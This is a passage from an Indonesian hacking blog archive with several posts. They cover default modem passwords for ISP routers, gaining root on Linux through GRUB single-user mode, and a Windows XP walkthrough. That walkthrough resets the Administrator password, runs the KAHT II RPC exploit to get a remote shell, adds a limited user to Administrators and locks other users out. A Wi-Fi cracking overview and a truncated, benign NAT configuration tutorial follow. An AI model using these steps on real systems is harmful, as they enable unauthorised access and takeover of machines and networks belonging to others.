commands:<br />bootload Set bootload information<br />cd &n bsp; Change current directory<br />clock Specify the system clock<br />compare Compare function<br />copy Copy from one file to another<br />debugging Enable system debugging functions<br />delete Delete a file<br />dir List files on a file system<br />display Display current system information<br />downsfu Down SFU’s DASL port<br />fixdisk Recover lost chains in storage device<br />format Format the device<br />free Clear user terminal interface<br />ftp Open FTP connection<br />language-mode Specify the language environment<br />lock Lock current user terminal interface<br />mkdir Create a new directory<br />more Display the contents of a file<br />move Move the file<br />msdp-tracert MSDP traceroute to source RP<br />mtracert Traceroute to multicast source<br />net Set net switch mode<br />patch Patch subcommands<br />ping Ping function<br />pwd Display current working directory<br />quit Exit from current command view<br />reboot Reboot whole router.<br />refresh Refresh routes<br />rename Rename a file or directory<br />reset Reset operation<br />rmdir Remove an existing directory<br />save Save current configuration<br />schedule schedule system task<br />send Send information to other user terminal interface<br />slave Specify HA command<br />startup Config paramater for system to startup<br />super Privilege current user a specified priority level<br />switch Switch communication channel<br />system-view Enter the system view<br />telnet Establish one TELNET connection<br />terminal Set the terminal line characteristics<br />tftp Open TFTP connection<br />tracert Trace route function<br />undelete Recover a deleted file<br />undo Cancel current setting<br />unzip Decompress a file<br />upgrade Online upgrade software<br />xmodem Receive a file by Xmodem protocol<br />zip Compress a file<br /><BRASS-MLK><br />itu command dari xmodem mereka …..<br />Oke sekarang kita analisa dari di atas.<br />Prolink modem biasanya password default mereka login : admin pass: password atau ada merk soho Login : admin : adslroot dll<br />silakan tergantung kreatifitas anda he he he.<br />Kalau kita dah masuk server itu tergantung kita mau apakan itu hehehe<br /><br /></span> <a href='http://trycahgo.blogspot.com/2009/08/hacking-speedy.html'>Read More..</a> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Diposting oleh <span class='fn'>try</span> </span> <span class='post-timestamp'> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Label: <a href='http://trycahgo.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <h2 class='date-header'>Jumat, 22 Mei 2009</h2> <div class='post hentry uncustomized-post-template'> <a name='8584439771556332778'></a> <h3 class='post-title entry-title'> <a href='http://trycahgo.blogspot.com/2009/05/jadi-root-di-linux-tanpa-password.html'>Jadi root di linux tanpa password.</a> </h3> <div class='post-header-line-1'></div> <div class='post-body entry-content'> Boot Linux tanpa Password <br />Melalui mode single pada GRUB <br />=====================================================<br /> Hi, ketemu lagi dengan saya, sikeren Al-k. ;)<br /> Sama seperti sebelum sebelumnya, yaitu artikel mengenai jebol password, <br /> tapi kali ini saya akan menjelaskannya pada Linux. <br /> Mungkin pada artikel yang lain telah di jelaskan bagaimana <br /> cara melakukan login tanpa password dengan bootloader Lilo,<br /> tapi kali ini saya akan menjelaskannya pada bootloader Grub.<br /><br /><br /><span class="fullpost"><br /> Beginilah caranya ...<br /> =====================================<br /><br /><br /> 1.) Defaultnya, pas di bootloader grub ada 2 pilihan yaitu Redhat Linux dan DOS.<br /> Pilih, yang Redhat Linux, terus tekan e di keyboard.<br /> Tombol e berguna untuk melakukan edit.<br /><br /> 2.) http://h1.ripway.com/alk/grub.png<br /> setelah itu, pilih bagian ke 2 atau 3, disitu tertulis kernel blablablablaba ...<br /> tekan e dikeyboard<br /><br /> 3.) Kemudian tambahkan s atau single dibelakangnya, kira kira seperti ini<br /><br /> kernel /boot/vmlinuz-2.6.15-1-686 root=/dev/sda1 ro single<br /><br /> setelah itu Escape.<br /><br /> 4.) Masih dalam keadaan memilih kernel, kemudian tekan b di keyboard untuk Boot. anda akan di bawa <br /> pada kedudukan root. Silahkan ketik passwd untuk mengganti password yang baru atau anda bisa <br /> mengedit file /etc/shadow, untuk menghilangkan password pada root.<br /><br /> Jreng jreng jreng ... satu lagi, anda login sebagai administrator tanpa password<br /><br /></span> <a href='http://trycahgo.blogspot.com/2009/05/jadi-root-di-linux-tanpa-password.html'>Read More..</a> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Diposting oleh <span class='fn'>try</span> </span> <span class='post-timestamp'> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Label: <a href='http://trycahgo.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <div class='post hentry uncustomized-post-template'> <a name='1105054725569385942'></a> <h3 class='post-title entry-title'> <a href='http://trycahgo.blogspot.com/2009/05/tekhnik-exploit-password-winxp.html'>Tekhnik Exploit Password WinXP</a> </h3> <div class='post-header-line-1'></div> <div class='post-body entry-content'> Kali ini saya akan mencoba untuk menjelaskan 2 teknik exploitasi pada windows XP, pertama melakukan pemanfaatan SAM files dan terakhir memanfaatkan RPC-nya Windows XP. Tekhnik kedua sebetulnya adalah kelanjutan dari artikelnya mRt di echo zine 10 yang membahas tentang Exploitasi Windows XP [pada fat32] dengan memanfaatkan sang Admin sendiri (hehuehuheue ... ) dan batch file yang disisipkan di start|program|startup oleh sang kriminal :), sedangkan kali ini yang saya bahas adalah jenis NTFS, yang tidak memiliki acces seperti pada fat32 untuk dapat menaruh batch file di folder start up nya sang Admin tersayang, sehingga apabila dipaksakan “Access Denied” adalah jawabannya. Apa akibatnya jika kita menggunakan kedua tekhnik diatas ?, yang jelas sama-sama buat orang seneng... <br />Tekhnik pertama : <br />Yang kita butuhkan sekarang adalah : <br />Petter Recovery Password yang bisa di download dari situsnya langsung http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html sekalian sama infonya aja, biasanya sudah di sediakan dalam bentuk rar yang bisa di jadikan bootdisk. Yang penulis pakai untuk experimen kali ini yaitu versi bd040818 terdapat 3 file di dalamnya yakni bd040818.bin , install.bat , rawrite2.exe .<br />1 buah disket kosong dan layak pakai. :) --> untuk disket boot Petter Recovery Password.<br />Nekatzzzz .... <br /><br /><br /><span class="fullpost"><br />Kasusnya begini, misalnya ....anggap saja kita lupa password untuk login winXP nya. : ) atau kasus yang laen aja kali ya, yang lebih menantang ... hehehe. Misalnya ada rampok yang kebingungan nggak bisa login, padahal kompienya mo dijual ... huehueueheue. Ada yang kesindir nggak nih ??? Udah ah bcanda mulu. Langsung aja deuh ... <br />Langkah pertama ... Setelah Petter Recovery Password di jadikan bootdisk, langsung saja booting dengan disket tersebut ... <br />Langkah berikutnya, anda akan di tanya di drive mana SAM file berada. Tekan enter saja untuk defaultnya, setelah itu akan ditanyakan secara spesifik lagi, di direktori mana file SAM berada, biasanya untuk yang defaultnya tuh SAM file berada di /windows/system32/config, enter lagi aja untuk yang defaultnya. Setelah itu ....... Nah sampe disini anda akan di minta User mana yang ingin di ganti/hapus passwordnya. Lebih baik Administrators aja, karena yang kita lakukan saat ini kan mencari cara untuk menjadi SU di Windows XP. Biar gampang melakukan sesuatu nantinya .... hehehehe !!! Untuk eksperiment kali ini lebih baik anda membuat password Administrators menjadi blankpassword [* = blankpassword], supaya gampang nantinya, dan blankpassword merupakan pilihan terbaik dalam menggunakan Petter Password Recovery. Soalnya penulis sendiri telah belasan kali mencoba mengganti password para user dengan tetapi hanya 2 yang berhasil. Sudah ??? ... siiiip, tekan ! untuk mengakhir sesi reset password, dan q untuk mengakhiri scripts tersebut. Selanjutnya anda akan di tanya kembali, ingin mengulang atau tidak. Lebih baik tidak lahhhh ... Edit Completed. Catatan : Setelah menggunakan Petter Recovery Password, Windows berusaha untuk melakukan scandisk, system ne baru di acak-acak nie : ). Tunggu hingga proses scandisk selesai. <br />Setelah proses booting, anda akan di hadapkan dengan tampilan login yang seperti biasanya. ( Nggak menarik, hehehehe... ) Sekarang tekan ctrl+alt+del, tunggu sebentar dan kemudian tekan kembali ctrl+alt+del. Nah ada tampilan login yang clasic, seperti di windows 98 dulu. Dengan 2 textbox... <br /><br />-------------------------------------------------<br />| Log On to Windows | x |<br />-------------------------------------------------<br />| User Name : Al-k | <br />| Password : ****** |<br />| |<br />| | Ok | | Cancel | | BLABLABLABLA....| |<br />------------------------------------------------- <br />Ya, bentuknya kira-kira seperti diatas ... : )... <br />Setelah itu ganti usernamenya menjadi Administrator, passwordnya di kosongkan saja, karena sebelumnya kita telah menjadikan blankpassword pada Administrator. Ok. Jreng-jreng-jreng... sekarang anda menjadi super user kembali. Silahkan buat account untuk anda sendiri. <br />Tekhnik Kedua : <br />Tiba saatnya kita maju bersama ... :D, memanfaatkan Massive RPC WinXP yang bobrok. Tekhnik kedua ini dibuat untuk para user yang memiliki acces limited. Yang dibuat kesal oleh sang admin, sehingga untuk menginstall suatu software harus minta izin dari sang Admin. :( . Yang dibutuhkan hanyalah acces untuk masuk ke command shell, dan satu tool kecil ‘kaht’ . Siap ???... buka command promptnya ... <br />C:\Documents and Settings\Al-k>net user<br />User accounts for \\NOMATTER<br /> -------------------------------------------------------------------------------<br /> Administrator Al-k GNU-- keluarga --<br /> Guest HelpAssistant SUPPORT_388945a0<br /> VUSR_NOMATTER<br /> The command completed successfully.<br />// Anggap saja disini Al-k adalah user yang limited<br />// Setelah itu masuk ke direktori di mana kaht berada<br />D:\Data+ku_><br />Kemudian kita test dulu kaht-nya... bisa nggak nih kita nge-root.<br /> D:\Data+ku_>kaht 127.0.0.0 127.0.0.3<br />_________________________________________________<br /><br /> KAHT II - MASSIVE RPC EXPLOIT<br /> DCOM RPC exploit. Modified by aT4r@3wdesign.es<br /> #haxorcitos && #localhost @Efnet Ownz you!!!<br /> FULL VERSION? :) - AUTOHACKING<br /> ________________________________________________<br /> [+] Targets: 127.0.0.0-127.0.0.3 with 50 Threads<br /> [+] Attacking Port: 135. Remote Shell at port: 34522<br /> [+] Scan In Progress...<br /> - Connecting to 127.0.0.2<br /><br /> Sending Exploit to a [WinXP] Server...<br /> - Conectando con la Shell Remota...<br />Microsoft Windows XP [Version 5.1.2600]<br />(C) Copyright 1985-2001 Microsoft Corp.<br />C:\WINDOWS\system32><br />Tuh kan dapet deh akses rootnya. Jangan seneng dulu. Langsung aja kita<br /> buat akses user yang terbatas tadi menjadi Super User. <br /><br />C:\WINDOWS\system32> net localgroup Administrators Al-k /add<br /><br /> The command completed successfully.<br /><br /> <br />Selanjutnya anda bisa login dengan user yang baru saja dirubah accountnya tadi. Dan anda bisa login ke account user lain yang memiliki akses sama seperti Administrator, tentunya dengan menghilangkan password user tersebut dulu sebelumnya. Dan anda bisa masuk ke regedit untuk menutup perizinan user account pada control panel :<br />HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/DisallowCpl/<br />, buat string baru dengan nama 1 dan ubah valuenya menjadi nusrmgr.cpl <br />Dan bisa anda disable akses ke command prompt kepada semua user. Sehingga anda menjadi SU yang benar-benar otoriter. Sayangnya tekhnik yang kedua ini hanya bisa di lakukan di Windows XP Service Pack 1. <br /><br /><br /></span> <a href='http://trycahgo.blogspot.com/2009/05/tekhnik-exploit-password-winxp.html'>Read More..</a> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Diposting oleh <span class='fn'>try</span> </span> <span class='post-timestamp'> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Label: <a href='http://trycahgo.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <h2 class='date-header'>Minggu, 17 Mei 2009</h2> <div class='post hentry uncustomized-post-template'> <a name='3652973987318334101'></a> <h3 class='post-title entry-title'> <a href='http://trycahgo.blogspot.com/2009/05/wireless-security-hacking-wifi_17.html'>Wireless Security (Hacking Wifi)</a> </h3> <div class='post-header-line-1'></div> <div class='post-body entry-content'> Jaringan Wifi memiliki lebih banyak kelemahan dibanding dengan jaringan kabel. Saat ini<br />perkembangan teknologi wifi sangat signifikan sejalan dengan kebutuhan sistem informasi yang<br />mobile. Banyak penyedia jasa wireless seperti hotspot komersil, ISP, Warnet, kampus-kampus<br />maupun perkantoran sudah mulai memanfaatkan wifi pada jaringan masing masing, tetapi sangat<br />sedikit yang memperhatikan keamanan komunikasi data pada jaringan wireless tersebut. Hal ini<br />membuat para hacker menjadi tertarik untuk mengexplore keamampuannya untuk melakukan<br />berbagai aktifitas yang biasanya ilegal menggunakan wifi.<br />Pada artikel ini akan dibahas berbagai jenis aktivitas dan metode yang dilakukan para hacker<br />wireless ataupun para pemula dalam melakukan wardriving. Wardriving adalah kegiatan atau<br />aktivitas untuk mendapatkan informasi tentang suatu jaringan wifi dan mendapatkan akses terhadap<br />jaringan wireless tersebut. Umumnya bertujuan untuk mendapatkan koneksi internet, tetapi banyak<br />juga yang melakukan untuk maksud-maksud tertentu mulai dari rasa keingintahuan, coba coba,<br />research, tugas praktikum, kejahatan dan lain lain.<br /><span class="fullpost"><br />Kelemahan Wireless<br />Kelemahan jaringan wireless secara umum dapat dibagi menjadi 2 jenis, yakni kelemahan pada<br />konfigurasi dan kelemahan pada jenis enkripsi yang digunakan. Salah satu contoh penyebab<br />kelemahan pada konfigurasi karena saat ini untuk membangun sebuah jaringan wireless cukup<br />mudah. Banyak vendor yang menyediakan fasilitas yang memudahkan pengguna atau admin<br />jaringan sehingga sering ditemukan wireless yang masih menggunakan konfigurasi wireless default<br />bawaan vendor. Penulis sering menemukan wireless yang dipasang pada jaringan masih<br />menggunakan setting default bawaan vendor seperti SSID, IP Address , remote manajemen, DHCP<br />enable, kanal frekuensi, tanpa enkripsi bahkan user/password untuk administrasi wireless tersebut.<br />WEP (Wired Equivalent Privacy) yang menjadi standart keamanan wireless sebelumnya, saat ini<br />dapat dengan mudah dipecahkan dengan berbagai tools yang tersedia gratis di internet. WPA-PSK<br />dan LEAP yang dianggap menjadi solusi menggantikan WEP, saat ini juga sudah dapat dipecahkan<br />dengan metode dictionary attack secara offline.<br /><br />Beberapa kegiatan dan aktifitas yang dilakukan untuk mengamanan jaringan wireless antara lain:<br />1. Menyembunyikan SSID<br />Banyak administrator menyembunyikan Services Set Id (SSID) jaringan wireless mereka dengan<br />maksud agar hanya yang mengetahui SSID yang dapat terhubung ke jaringan mereka. Hal ini<br />tidaklah benar, karena SSID sebenarnya tidak dapat disembuyikan secara sempurna. Pada saat saat<br />tertentu atau khususnya saat client akan terhubung (assosiate) atau ketika akan memutuskan diri<br />(deauthentication) dari sebuah jaringan wireless, maka client akan tetap mengirimkan SSID dalam<br />bentuk plain text (meskipun menggunakan enkripsi), sehingga jika kita bermaksud menyadapnya,<br />dapat dengan mudah menemukan informasi tersebut. Beberapa tools yang dapat digunakan untuk<br />mendapatkan ssid yang dihidden antara lain, kismet (kisMAC), ssid_jack (airjack), aircrack ,<br />void11 dan masih banyak lagi.<br />2. Keamanan wireless hanya dengan kunci WEP<br />WEP merupakan standart keamanan & enkripsi pertama yang digunakan pada wireless, WEP<br />memiliki berbagai kelemahan antara lain :<br /> Masalah kunci yang lemah, algoritma RC4 yang digunakan dapat dipecahkan.<br /> WEP menggunakan kunci yang bersifat statis<br /> Masalah initialization vector (IV) WEP<br /> Masalah integritas pesan Cyclic Redundancy Check (CRC-32)<br />WEP terdiri dari dua tingkatan, yakni kunci 64 bit, dan 128 bit. Sebenarnya kunci rahasia pada<br />kunci WEP 64 bit hanya 40 bit, sedang 24bit merupakan Inisialisasi Vektor (IV). Demikian juga<br />pada kunci WEP 128 bit, kunci rahasia terdiri dari 104bit.<br />Serangan-serangan pada kelemahan WEP antara lain :<br />- Serangan terhadap kelemahan inisialisasi vektor (IV), sering disebut FMS attack. FMS<br />singkatan dari nama ketiga penemu kelemahan IV yakni Fluhrer, Mantin, dan Shamir.<br />Serangan ini dilakukan dengan cara mengumpulkan IV yang lemah sebanyak-banyaknya.<br />Semakin banyak IV lemah yang diperoleh, semakin cepat ditemukan kunci yang digunakan<br />( www.drizzle.com/~aboba/IEEE/rc4_ksaproc.pdf )<br />- Mendapatkan IV yang unik melalui packet data yang diperoleh untuk diolah untuk proses<br />cracking kunci WEP dengan lebih cepat. Cara ini disebut chopping attack, pertama kali<br />ditemukan oleh h1kari. Teknik ini hanya membutuhkan IV yang unik sehingga mengurangi<br />kebutuhan IV yang lemah dalam melakukan cracking WEP.<br />- Kedua serangan diatas membutuhkan waktu dan packet yang cukup, untuk mempersingkat<br />waktu, para hacker biasanya melakukan traffic injection. Traffic Injection yang sering<br />dilakukan adalah dengan cara mengumpulkan packet ARP kemudian mengirimkan kembali<br />ke access point. Hal ini mengakibatkan pengumpulan initial vektor lebih mudah dan cepat.<br />Berbeda dengan serangan pertama dan kedua, untuk serangan traffic injection,diperlukan<br />spesifikasi alat dan aplikasi tertentu yang mulai jarang ditemui di toko-toko, mulai dari chipset, versi firmware, dan versi driver serta tidak jarang harus melakukan patching<br />terhadap driver dan aplikasinya.<br />3. Keamanan wireless hanya dengan kunci WPA-PSK atau WPA2-PSK<br />WPA merupakan teknologi keamanan sementara yang diciptakan untuk menggantikan kunci<br />WEP. Ada dua jenis yakni WPA personal (WPA-PSK), dan WPA-RADIUS.<br />Saat ini yang sudah dapat di crack adalah WPA-PSK, yakni dengan metode brute force<br />attack secara offline. Brute force dengan menggunakan mencoba-coba banyak kata dari suatu<br />kamus. Serangan ini akan berhasil jika passphrase yang yang digunakan wireless tersebut<br />memang terapat pada kamus kata yang digunakan si hacker.<br />Untuk mencegah adanya serangan terhadap keamanan wireless menggunakan WPA-PSK,<br />gunakanlah passphrase yang cukup panjang (satu kalimat).<br />Tools yang sangat terkenal digunakan melakukan serangan ini adalah CoWPAtty (<br />http://www.churchofwifi.org/ ) dan aircrack ( http://www.aircrack-ng.org ) . Tools ini<br />memerlukan daftar kata atau wordlist, dapat di ambil dari http://wordlist.sourceforge.net/<br />4. MAC Filtering<br />Hampir setiap wireless access point maupun router difasilitasi dengan keamanan MAC<br />Filtering. Hal ini sebenarnya tidak banyak membantu dalam mengamankan komunikasi<br />wireless, karena MAC address sangat mudah dispoofing atau bahkan dirubah.<br />Tools ifconfig pada OS Linux/Unix atau beragam tools spt network utilitis, regedit, smac,<br />machange pada OS windows dengan mudah digunakan untuk spoofing atau mengganti<br />MAC address.<br />Penulis masih sering menemukan wifi di perkantoran dan bahkan ISP (yang biasanya<br />digunakan oleh warnet-warnet) yang hanya menggunakan proteksi MAC Filtering. Dengan<br />menggunakan aplikasi wardriving seperti kismet/kisMAC atau aircrack tools, dapat<br />diperoleh informasi MAC address tiap client yang sedang terhubung ke sebuah Access Point.<br />Setelah mendapatkan informasi tersebut, kita dapat terhubung ke Access point dengan<br />mengubah MAC sesuai dengan client tadi. Pada jaringan wireless, duplikasi MAC adress<br />tidak mengakibatkan konflik. Hanya membutuhkan IP yang berbeda dengan client yang tadi.<br />5. Captive Portal<br />Infrastruktur Captive Portal awalnya didesign untuk keperluan komunitas yang<br />memungkinkan semua orang dapat terhubung (open network). Captive portal sebenarnya<br />merupakan mesin router atau gateway yang memproteksi atau tidak mengizinkan adanya trafik<br />hingga user melakukan registrasi/otentikasi. Berikut cara kerja captive portal :<br /> user dengan wireless client diizinkan untuk terhubung wireless untuk mendapatkan IP<br />address (DHCP)<br /> block semua trafik kecuali yang menuju ke captive portal (Registrasi/Otentikasi berbasis<br />web) yang terletak pada jaringan kabel.<br /> redirect atau belokkan semua trafik web ke captive portal<br /> setelah user melakukan registrasi atau login, izinkan akses ke jaringan (internet)<br /><br />Beberapa hal yang perlu diperhatikan, bahwa captive portal hanya melakukan tracking koneksi<br />client berdasarkan IP dan MAC address setelah melakukan otentikasi. Hal ini membuat captive<br />portal masih dimungkinkan digunakan tanpa otentikasi karena IP dan MAC adress dapat dispoofing.<br />Serangan dengan melakukan spoofing IP dan MAC. Spoofing MAC adress seperti yang sudah<br />dijelaskan pada bagian 4 diatas. Sedang untuk spoofing IP, diperlukan usaha yang lebih yakni<br />dengan memanfaatkan ARP cache poisoning, kita dapat melakukan redirect trafik dari client yang<br />sudah terhubung sebelumnya.<br />Serangan lain yang cukup mudah dilakukan adalah menggunakan Rogue AP, yaitu mensetup Access<br />Point (biasanya menggunakan HostAP) yang menggunakan komponen informasi yang sama seperti<br />AP target seperti SSID, BSSID hingga kanal frekwensi yang digunakan. Sehingga ketika ada client<br />yang akan terhubung ke AP buatan kita, dapat kita membelokkan trafik ke AP sebenarnya.<br />Tidak jarang captive portal yang dibangun pada suatu hotspot memiliki kelemahan pada konfigurasi<br />atau design jaringannya. Misalnya, otentikasi masih menggunakan plain text (http), managemen<br />jaringan dapat diakses melalui wireless (berada pada satu network), dan masih banyak lagi.<br />Kelemahan lain dari captive portal adalah bahwa komunikasi data atau trafik ketika sudah<br />melakukan otentikasi (terhubung jaringan) akan dikirimkan masih belum terenkripsi, sehingga<br />dengan mudah dapat disadap oleh para hacker. Untuk itu perlu berhati-hati melakukan koneksi pada<br />jaringan hotspot, agar mengusahakan menggunakan komunikasi protokol yang aman seperti<br />https,pop3s, ssh, imaps dst.<br />Semina<br /></span> <a href='http://trycahgo.blogspot.com/2009/05/wireless-security-hacking-wifi_17.html'>Read More..</a> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Diposting oleh <span class='fn'>try</span> </span> <span class='post-timestamp'> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Label: <a href='http://trycahgo.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <div class='post hentry uncustomized-post-template'> <a name='8940778878953581871'></a> <h3 class='post-title entry-title'> <a href='http://trycahgo.blogspot.com/2009/05/konfigurasi-router-nat-pada-windows.html'>Konfigurasi Router NAT pada windows 2000 server</a> </h3> <div class='post-header-line-1'></div> <div class='post-body entry-content'> Network Address Translation (NAT) adalah suatu teknik untuk mengubah suatu IP address ke IP address yg lain. Hal ini bisa dikarenakan karena di jaringan kita mengunakan network address yg disebut private address space di RFC 1918, yaitu:<br />10.0.0.0 - 10.255.255.255 (10/8 prefix)<br />172.16.0.0 - 172.31.255.255 (172.16/12 prefix)<br />192.168.0.0 - 192.168.255.255 (192.168/16 prefix)<br />Dan karena ini adalah private address, jaringan kita tentunya tidak dapat berkomunikasi dgn jaringan lain di Internet, karena semua host yg ingin terkoneksi di Internet harus menggunakan global atau public IP address. Untuk ini kita perlu men-translate IP address kita yg private menjadi public IP address.<br />Alasan lain untuk menggunakan NAT adalah security. Kita bisa men-translate seluruh jaringan kita (missal 254 PC) menjadi 1 public IP. Teknik ini disebut many-to-one NAT atau biasa disebut Port Address Translation (PAT). Teknik ini sangat bermanfaat jika kita menginginkan user di jaringan kita untuk meng-inisiasi koneksi ke Internet (browsing internet atau mengirim email misalnya), tapi kita tidak menginginkan host dari Internet untk meng-inisiasi koneksi ke PC user kita.<br /><br /><span class="fullpost"><br />Host dari Internet tidak bisa meng-inisiasi koneksi ke internal host kita karena hanya ada 1 public IP address yg terlihat di jaringan kita, sedangkan jumlah PC yg sebenarnya ada lebih dari 1. Tentunya jika PC kita yg meng-inisiasi, maka reply atau return packet akan bisa<br />kembali karena device yg kita gunakan untuk melakukan NAT, akan memiliki mapping table dari NAT yg terjadi di jaringan.<br />Untuk kasus one-to-one NAT, dimana 1 private IP akan di-translate menjadi 1 global IP, maka mapping nya akan spt berikut:<br />Router#sh ip nat tra<br />Pro Inside global Inside local Outside local Outside global<br />— 195.1.134.1 192.168.1.1 — —<br />— 195.1.134.2 192.168.1.2 — —<br />Dalam contoh ini, IP private 192.168.1.1 di-translate ke public IP 195.1.134.1, IP private 192.168.1.2 di-translate ke public IP 195.1.134.2 dst.<br />Inside local adalah terminologi utk real IP address PC di jaringan kita, sedangkan Inside Global adalah public IP address yg kita gunakan untuk men-translasi real IP address tsb.<br />Outside local adalah local IP address dari tujuan kita sebagaimana kita melihatnya dari jaringan kita. Sedangkan Outside global adalah global IP address dari tujuan kita yg terlihat di Internet.<br />Ini bermanfaat utk destination based NAT, sbg contoh sbg berikut:<br />Ada server di Internet dgn global IP address 11.11.11.11, tapi kita ingin semua users di jaringan kita utk melihat server tsb sbg 192.168.1.11<br />Maka kita bisa melakukan destination based NAT, dgn outside local adalah 192.168.1.11 dan outside global, IP address tujuan yg sebenernya, adalah 11.11.11.11.<br />Jika kita tidak melakukan destination based NAT, maka outside local dan outside global dari tujuan kita akan sama, yaitu public IP tujuan yg sebenernya, dan ini bisa dilihat di contoh mapping PAT.<br />Untuk contoh many-to-one NAT atau PAT, dimana banyak real IP dari PC kita di-translate menjadi 1 public IP, maka contoh mapping nya sbg berikut:<br />Router#sh ip nat tra<br />Pro Inside global Inside local Outside local Outside global<br />tcp 195.1.134.4:12338 192.168.1.3:12338 33.33.33.33:23 33.33.33.33:23<br />tcp 195.1.134.4:12337 192.168.1.2:12337 22.22.22.22:23 22.22.22.22:23<br />Dalam contoh ini, kita melakukan telnet (destination tcp port 23) ke remote host 22.22.22.22<br />dari private IP 192.168.1.2, dan telnet ke remote host 33.33.33.33 dari private IP 192.168.1.3.<br />Kita bisa lihat bahwa ke-2 private IP kita di-translate ke public IP yg sama, yaitu 195.1.134.4. Yg membedakan adalah source port yg digunakan di public IP.<br />Jadi di mapping ini terlihat bahwa koneksi dari 192.168.1.2 di map ke 195.1.134.4 port 12337, sedangkan koneksi dari 192.168.1.3 di map ke 195.1.134.4 port 12338.<br />Dgn adanya mapping ini, remote host 22.22.22.22 ketika mengirimkan paket reply (ingat di TCP/IP reply dari remote host destination portnya ditujukan ke source port dari host kita), akan mengirimkan paket ke 195.1.134.4 port 12337. Sedangkan reply packet dari 33.33.33.33 kan ke 195.1.134.4 port 12338.<br />Berdasarkan mapping tadi, NAT device atau router yg melakukan map bisa mengetahui bahwa packet reply dari 22.22.22.22 harus dikirimkan ke host 192.168.1.2 dan paket reply dari 33.33.33.33 harus dikirimkan ke host 192.168.1.3<br />Dari ke-2 contoh di atas kelihatan bahwa untuk normal NAT atau one-to-one NAT, setiap private IP akan memiliki public IP sendiri sehingga setiap host di jaringan kita masih bisa di hubungi dari luar. Host dari Internet masih bisa utk menghubungi tiap host kita karena<br />mereka memiliki public IP yg berbeda-beda.<br />Namun untuk kasus many-to-one NAT atau PAT, host dari Internet tidak dapat menghubungi setiap host karena semua host memiliki 1 public IP yg sama. Host dari internet hanya bisa me-reply koneksi dari host kita berdasarkan source port yg berbeda-beda.<br />Ok, langsung masuk contoh konfigurasi biar makin jelas. Contoh dilakukan dgn menggunakan Cisco router dgn 1 ethernet interface konek ke internal network dan 1 serial interface konek ke Internet. Kalo udah ngerti konsepnya bisa pake NAT device apa aja, gue sendiri buat memproteksi home lab gue pake OpenBSD PF.<br />Topologi:<br />Internal network – (eth0) router (s0/0) – internet<br />Internal network kita menggunakan private IP 192.168.1.0/24. IP address eth0 router kita 192.168.1.1 yg merupakan default gateway dari semua host di internal network.<br />1. Many-to-one PAT, semua private IP ke 1 public IP address<br />Kita cuma dapet 1 IP address dari ISP 195.1.134.2/30 yg juga merupakan IP address serial 0/0, router ISP kita menggunakan IP 195.1.134.1 yg juga merupakan default route router kita.<br />Maka konfigurasi PAT sbg berikut:<br />- Buat ACL yg mem-permit semua network 192.168.1.0/24<br />Router(config)#ip access-list standard internal_network<br />Router(config-std-nacl)#permit 192.168.1.0 0.0.0.255<br />- Bikin NAT rule untuk mentranslate net 192.168.1.0/24 ke 195.1.134.2 yg merupakan IP address s0/0<br />Router(config)#ip nat inside source list internal_network interface s0/0 overload<br />- enable NAT di interface e0/0 dan s0/0<br />Router(config)#int e0/0<br />Router(config-if)#ip nat inside<br />Router(config)#int s0/0<br />Router(config-if)#ip nat outside<br />2. ISP kita ternyata memberikan kita public IP 195.1.134.0/24, yg berarti range public IP yg bisa kita gunakan adalah 195.1.134.1 – 195.1.134.254. Ini berarti kita bisa melakukan one-to-one NAT, contoh:<br />192.168.1.1 ke 195.1.134.1<br />192.168.1.2 ke 195.1.134.2, dst.<br />Maka konfigurasi yg perlu dilakukan hanya:<br />Router(config)#ip nat inside source static network 192.168.1.0 195.1.134.0 /24<br />Tentunya enable NAT di e0/0 dan s0/0 spt contoh no.1<br />3. Kalo gak dapet persis 254 public IP gimana? Misal dapetnya 195.1.134.0/29, yg berarti range public IP yg bisa digunakan adalah 195.1.134.1-195.1.134.6 (ingat dgn /29 ada total 8 IP dari 0 sampai 7, tapi 0 adalah network address dan 7 sebagai IP terakhir merupakan<br />broadcast address).<br />Jika kita mau mentranslate net 192.168.1.0/24 ke range IP 195.1.134.1-195.1.134.6<br />- bikin NAT pool<br />Router(config)#ip nat pool public_IP 195.1.134.1 195.1.134.6 netmask 255.255.255.248<br />- bikin NAT rule, pake ACL internal_network spt contoh no.1 buat permit semua internal net 192.168.1.0/24<br />Router(config)#ip nat inside source list intenal_network pool public_IP<br />Jgn lupa enable NAT di e0/0 dan s0/0 spt contoh no.1<br />4. Ada masalah dgn contoh no.3? Ada.<br />Dalam 1 waktu, hanya ada 6 internal private IP yg bisa di translate ke 6 public 